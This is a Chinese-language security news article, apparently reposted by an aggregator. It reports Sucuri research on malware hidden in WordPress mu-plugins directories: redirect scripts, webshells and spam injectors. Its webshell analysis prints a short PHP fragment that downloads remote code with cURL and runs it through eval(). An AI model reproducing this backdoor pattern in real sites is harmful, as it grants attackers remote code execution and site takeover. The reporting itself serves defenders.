安全客 04月01日
WordPress mu - plugins 目录危机:恶意软件潜藏,远程代码执行风险飙升
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

近期研究揭示,攻击者正在将恶意代码隐藏在 WordPress 网站的 mu-plugins 目录中,该目录的自动加载特性使得恶意代码的检测和清除变得更加困难。这些恶意软件变种采用复杂技术,如用户重定向、Webshell 和垃圾邮件注入器,以保持持续性并执行有害功能。攻击者精心设计恶意软件,使其难以被搜索引擎和特权用户发现。受感染网站面临声誉受损、数据盗窃和未经授权的修改等多种后果,其中最具破坏性的变种允许攻击者持续访问被攻陷的网站。

🕵️ 攻击目标:攻击者主要针对 WordPress 网站的 mu-plugins 目录,该目录会自动加载,从而增加了恶意代码的隐蔽性和清除难度。

🚨 恶意软件类型:已发现的恶意软件包括重定向脚本(将访客重定向到有害域名)、Webshell(提供远程代码执行能力)和垃圾邮件注入器(操纵网站内容)。

🛡️ 隐蔽技术:攻击者使用复杂技术,如隐藏恶意行为,使其难以被搜索引擎爬虫和特权用户发现,以确保恶意软件的持久性。

💥 潜在后果:受感染的网站可能面临声誉受损、数据盗窃、恶意软件传播以及未经授权的修改等问题,尤其是最具破坏性的变种,允许攻击者持续访问被攻陷的网站。

💻 Webshell 分析:其中一个令人担忧的变种是伪装成合法 WordPress 插件文件的 Webshell,它利用 eval() 函数执行从远程服务器获取的任意代码,从而允许攻击者完全控制网站。

近期的一些发现揭示了一个令人担忧的趋势:威胁行为者正策略性地将恶意代码隐藏在 WordPress 网站的 mu-plugins目录中。

这个目录对攻击者来说特别有价值,因为它会随着 WordPress 自动加载,这使得恶意代码的检测和清除变得更加困难。

已发现的恶意软件变种采用了复杂的技术来保持其持续性,同时执行从用户重定向到完全接管网站等一系列有害功能。

这些攻击针对的是 mu-plugins文件夹,攻击者使用了多种看似合法但包含恶意代码的恶意软件类型。

其中包括将毫无防备的访客重定向到有害域名的重定向脚本、为攻击者提供远程代码执行能力的Webshell,以及操纵网站内容以分发不需要的材料的垃圾邮件注入器。

Sucuri 的研究人员检测到,这些恶意软件变种经过精心设计,通过让搜索引擎爬虫和特权用户无法看到其恶意行为来躲避检测。

他们的分析显示,攻击者正在使用越来越复杂的技术,以确保他们的恶意软件一直处于隐藏状态,同时最大限度地发挥其对目标网站的影响。

感染了这些恶意脚本的网站会面临多种后果,包括声誉受损、潜在的数据被盗、向访客传播恶意软件以及对网站进行未经授权的修改。

最具破坏性的变种使攻击者能够持续访问被攻陷的网站,为长期的恶意利用奠定了基础。

Webshell 分析:远程代码执行能力

已发现的最令人担忧的变种是一个伪装成合法 WordPress 插件文件的Webshell,它被放置在 “wp-content/mu-plugins/index.php” 位置。

这个Webshell包含旨在下载并执行远程 PHP 脚本的代码:

if (curl_errno($connectionHandle))

die(‘cURL error occurred: ‘. curl_error($connectionHandle));

}

curl_close($connectionHandle);

eval(“?>” . $retrievedCode);

这段代码片段展示了恶意软件如何使用 PHP 的 eval () 函数来执行从远程服务器获取的任意代码。

这种方法使攻击者能够以与 Web 服务器相同的权限运行命令,这有可能导致网站被完全攻陷。

一旦建立起这个后门,攻击者就能够上传文件、删除内容并访问敏感信息,将被攻陷的网站变成一个针对访客和连接系统发动进一步攻击的平台。

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

WordPress 恶意软件 mu-plugins Webshell 安全
相关文章